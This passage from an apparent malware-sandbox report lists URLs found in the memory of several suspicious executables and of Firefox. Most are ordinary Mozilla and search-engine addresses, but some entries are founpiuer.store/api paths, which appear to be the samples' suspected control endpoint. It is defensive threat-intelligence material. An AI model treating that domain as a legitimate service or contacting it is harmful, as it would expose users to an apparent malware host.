Source: 3e169c0a7e.exe, 00000009.00000003.2948054390.000000000540B000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2949019284.000000000540B000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2961848227.0000000003498000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3084602263.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3245912168.000001B6315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 0000001D.00000002.3449360163.000001B637847000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3303944369.000001B635442000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180chrome://browser/content/browser-fullScreenAndPo
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: 3e169c0a7e.exe, 00000009.00000003.2900557208.00000000053A9000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900874990.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900671533.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926351246.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2925930815.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926030012.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041989367.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041685223.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041600113.0000000005B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 3e169c0a7e.exe, 00000009.00000003.2900557208.00000000053A9000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900874990.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900671533.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926351246.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2925930815.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926030012.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041989367.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041685223.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041600113.0000000005B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 3e169c0a7e.exe, 00000009.00000003.2900557208.00000000053A9000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900874990.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900671533.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926351246.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2925930815.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926030012.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041989367.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041685223.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041600113.0000000005B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001D.00000002.3418311411.000001B636A4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068223683.000001B635761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068004981.000001B63573F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001D.00000002.3301079481.000001B635203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3472196282.000001B639509000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3248030030.000001B6316B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: 3e169c0a7e.exe, 00000009.00000003.2948054390.000000000540B000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2949019284.000000000540B000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2961848227.0000000003498000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3084602263.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3245912168.000001B6315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 3e169c0a7e.exe, 00000009.00000003.2934747580.000000000540C000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2961848227.0000000003498000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3084602263.0000000005AFF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3245912168.000001B6315AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 0000001D.00000002.3301079481.000001B6352E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3489841190.000001B63DF34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 0000001D.00000002.3483013862.000001B63DC80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3483013862.000001B63DCDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000003.3141800421.000001B63DCDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3480721237.000001B63DBDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3489841190.000001B63DF34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001D.00000002.3191369944.000001B625D30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3191369944.000001B625D11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001D.00000003.3129065732.000001B63DA5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsUsi
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001D.00000003.3129065732.000001B63DA5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3479649121.000001B63DA5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3540303643.0000000000B3C000.00000040.00000001.01000000.0000000C.sdmp, 7fb3e2a1d2.exe, 0000000E.00000003.2960979403.00000000051CB000.00000004.00001000.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3420827049.000000000880B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: firefox.exe, 0000001D.00000002.3497366247.000014FC8A604000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001D.00000002.3489841190.000001B63DFD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3067599382.000001B63571E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3348398161.000001B636000000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.3370593805.000001B6364A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3499995922.000026D973A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3191369944.000001B625DE8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068223683.000001B635761000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3068004981.000001B63573F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 0000001D.00000002.3499653000.000019553EF00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?Z
Source: 3e169c0a7e.exe, 00000009.00000003.2900557208.00000000053A9000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900874990.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900671533.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926351246.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2925930815.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926030012.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041989367.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041685223.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041600113.0000000005B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 3e169c0a7e.exe, 00000009.00000003.2900557208.00000000053A9000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900874990.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900671533.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926351246.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2925930815.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926030012.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041989367.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041685223.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041600113.0000000005B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 3e169c0a7e.exe, 00000009.00000003.2900557208.00000000053A9000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900874990.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2900671533.00000000053A6000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926351246.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2925930815.0000000005B6D000.00000004.00000800.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.2926030012.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041989367.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041685223.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3041600113.0000000005B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001D.00000002.3348398161.000001B636000000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001D.00000003.3097197709.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3330207750.000001B635DDA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3327340390.000001B635A7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3097956840.000001B635DC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001D.00000002.3497366247.000014FC8A604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ebay.comP
Source: firefox.exe, 0000001D.00000002.3290075534.000001B6336D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3327340390.000001B635A7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%shttps://outlook.live.com/default.aspx?rru=compose&
Source: firefox.exe, 0000001D.00000002.3426676265.000001B636CF0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001D.00000003.3158885940.000001B6371AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.3153854845.000001B637150000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordshttps
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1It
Source: 3e169c0a7e.exe, 0000000F.00000003.3164550689.00000000013FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/
Source: 3e169c0a7e.exe, 0000000F.00000003.3026864104.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/api
Source: 3e169c0a7e.exe, 0000000F.00000003.3374266320.00000000013B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/api(
Source: 3e169c0a7e.exe, 0000000F.00000003.3074568710.00000000013F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apiCach
Source: 3e169c0a7e.exe, 0000000F.00000003.3073046001.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3085434913.0000000005AED000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3072209573.0000000005AEA000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3074426783.0000000005AED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apiObGo
Source: 3e169c0a7e.exe, 00000009.00000003.2957681876.0000000000D90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apih
Source: 3e169c0a7e.exe, 0000000F.00000003.3055337116.00000000013FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apiice
Source: 3e169c0a7e.exe, 00000009.00000003.2912786822.0000000000D96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apio#
Source: 3e169c0a7e.exe, 0000000F.00000003.3101003855.0000000005AE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apip9
Source: 3e169c0a7e.exe, 00000009.00000003.2950298828.000000000540D000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2934747580.000000000540C000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2948054390.000000000540D000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2932300556.000000000540D000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2949019284.000000000540D000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2932074040.000000000540D000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2932851792.000000000540D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/bl
Source: 3e169c0a7e.exe, 00000009.00000003.3008677570.000000000540D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/iV
Source: 3e169c0a7e.exe, 0000000F.00000003.3374266320.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3245199739.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3026864104.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/pi
Source: 3e169c0a7e.exe, 00000009.00000003.3029459573.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/ta
Source: 3e169c0a7e.exe, 00000009.00000003.3029459573.0000000000D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/uo
Source: 3e169c0a7e.exe, 00000009.00000003.2950298828.000000000540D000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2948054390.000000000540D000.00000004.00000800.00020000.00000000.sdmp, 3e169c0a7e.exe, 00000009.00000003.2949019284.000000000540D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/zB
Source: firefox.exe, 0000001D.00000002.3303944369.000001B635403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3501508527.000037F8EBB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3270733549.000001B63336D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001D.00000002.3242645635.000001B6313C0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3301079481.000001B635260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3391045339.000001B636617000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B6336C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
